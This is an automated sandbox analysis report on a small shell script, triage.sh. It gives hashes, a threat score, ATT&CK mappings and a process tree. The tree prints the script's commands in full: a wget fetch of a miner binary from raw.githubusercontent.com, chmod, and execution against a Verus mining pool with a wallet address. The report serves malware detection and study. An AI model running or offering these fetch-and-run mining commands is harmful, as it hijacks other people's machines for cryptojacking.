6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db

Analysis

max time kernel
1s
max time network
1678s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
14-07-2024 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

triage.sh
Size

338B
MD5

dead3dccf4825eb422f4dac04f2d8279
SHA1

61285497f6daecf9d6d6128d5ced6f19057f93bd
SHA256

6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db
SHA512

c4c5fc0a655488ea60b4d5801cab925e180e3d018f88e9238eb9bc794ddc73ec44059fad796cb1655fed44a7c861990d5960eb7a41f8fa4a24390cb27cd1f55b

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/cc	1450	cc

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com
4	raw.githubusercontent.com

Reads runtime system information 7 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/fd	apt-get
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1397/status	apt-get
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/self/fd	sudo

Writes file to tmp directory 17 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/clearsigned.message.9uVGKs	apt-get
File opened for modification	/tmp/clearsigned.message.Rv8Bas	apt-get
File opened for modification	/tmp/clearsigned.message.zH753r	apt-get
File opened for modification	/tmp/clearsigned.message.Uatpts	apt-get
File opened for modification	/tmp/clearsigned.message.RJkHJs	apt-get
File opened for modification	/tmp/clearsigned.message.39UGqq	apt-get
File opened for modification	/tmp/clearsigned.message.ytLQ8o	apt-get
File opened for modification	/tmp/clearsigned.message.e1EiBs	apt-get
File opened for modification	/tmp/clearsigned.message.qSUTqp	apt-get
File opened for modification	/tmp/clearsigned.message.K3ft8s	apt-get
File opened for modification	/tmp/clearsigned.message.peKmCt	apt-get
File opened for modification	/tmp/cc	wget
File opened for modification	/tmp/clearsigned.message.Dmzodq	apt-get
File opened for modification	/tmp/clearsigned.message.w1ycdr	apt-get
File opened for modification	/tmp/clearsigned.message.3JcV9p	apt-get
File opened for modification	/tmp/clearsigned.message.4jssLs	apt-get
File opened for modification	/tmp/clearsigned.message.LWkHvp	apt-get

/tmp/triage.sh
/tmp/triage.sh
1⤵
PID:1403
- /usr/bin/sudo
  sudo apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
  2⤵
  - Reads runtime system information
  PID:1404
- - /usr/bin/apt-get
    apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1405
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:1406
- /usr/bin/wget
  wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc
  2⤵
  - Writes file to tmp directory
  PID:1407
- /usr/bin/chmod
  chmod +x cc
  2⤵
  PID:1447
- /usr/bin/clear
  clear
  2⤵
  PID:1448
- /usr/bin/nproc
  nproc
  2⤵
  PID:1449
- /tmp/cc
  ./cc -a verus -o stratum+tcp://verus.farm:9999 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Linux -p x -t 1
  2⤵
  - Executes dropped EXE
  PID:1450

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
180B

MD5
fe1f8c916b80c0dfdb5e9953aacef1b5

SHA1
57845fbfa9bb5fa0041769999837c1de9fe6cb01

SHA256
d14696c5f1de0cc705cdb69e2020792945b21788007483c877ef5f0d4324a2b0

SHA512
a1f0b616052e748a02131129283385032a8759da25e2f831ac047913bddd368f64dd2367efdee15f64c65142c351e77c39d92c54b03cfebde6539d4d449bce98

Download Submit
/tmp/cc

Filesize
196KB

MD5
4011d473f6b06caa7f3d514e4eeb2184

SHA1
529bda4d64920cac51baa6b34b8bcabf19d97248

SHA256
bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2

SHA512
45f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39

Download Submit
/tmp/clearsigned.message.e1EiBs

Filesize
257KB

MD5
f7baae962e2417343c0d68864dea6b69

SHA1
014599a6b6aff7497bc72d0f6ae30f7aa6383c1a

SHA256
52486e27d87061aa66607e1c03ab199be5658c67d4f166c20793ded09859bd6f

SHA512
fc0fca14d6752a81dfb433846e08ece181a51f72210126d935b6dde959aba36a04f5a92c2a0c2927c47e646807438f588b3f04f616ea34a10204baf54541bf23

Download Submit